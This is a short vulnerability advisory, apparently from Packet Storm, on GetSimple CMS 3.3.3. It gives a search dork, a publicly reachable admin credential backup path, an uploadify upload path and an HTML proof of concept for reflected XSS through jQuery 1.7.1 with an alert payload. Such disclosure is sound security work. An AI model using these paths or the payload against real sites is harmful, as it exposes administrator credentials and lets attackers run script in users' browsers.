Get Simple CMS version 3.3.3 suffers from information disclosure, upload, and cross site scripting vulnerabilities.
cbbfcd1ffbd19b40f68a09bc3831b08a98ed0e3a45c608112c9f9cce82a3a2efGetSimpleCMS_3.3.3 multi Vulnerability
======================================
Author : indoushka
Vondor : http://get-simple.info/
Dork: © 2009-2014 GetSimple CMS – Version 3.3.3
==================================================
info :
http://127.0.0.1/GetSimpleCMS3/backups/users/admin.xml.bak
upload :
http://127.0.0.1/GetSimpleCMS/admin/template/js/uploadify/uploadify.swf
XSS Reflected - Jquery v1.7.1 :
<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - Jquery v1.7.1 </title>
<script src="http://127.0.0.1/GetSimpleCMS3/admin/template/js/jquery.min.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>
<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script>alert('xss
reflected - jquery v1.7.1 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com');</script></option>
</select>
</p>
</form>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed